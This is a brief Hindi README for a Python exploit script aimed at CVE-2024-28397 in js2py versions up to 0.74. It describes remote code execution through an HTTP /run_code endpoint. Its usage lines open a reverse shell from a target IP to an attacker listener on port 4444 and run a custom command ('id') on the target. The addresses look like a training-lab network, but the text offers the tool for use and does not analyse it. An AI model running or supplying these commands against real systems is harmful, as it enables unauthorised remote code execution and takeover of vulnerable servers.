
CVE-2024-28397 के लिए पायथन एक्सप्लॉइट स्क्रिप्ट, js2py <= v0.74 को लक्ष्य करता है। रिवर्स शेल और HTTP एंडपॉइंट के माध्यम से कस्टम कमांड निष्पादन का समर्थन करता है।
डिफ़ॉल्ट रिवर्स शेल पेलोड और वैकल्पिक कमांड आर्गुमेंट की अनुमति है
एक्सप्लॉइट js2py <= v0.74 के लिए काम करता है
requests लाइब्रेरी (pip install requests)रिवर्स शेल:
python exploit.py 10.129.227.108 /run_code --local_ip 10.10.14.71 --local_port 4444
कस्टम कमांड:
python exploit.py 10.129.227.108 /run_code --cmd "id"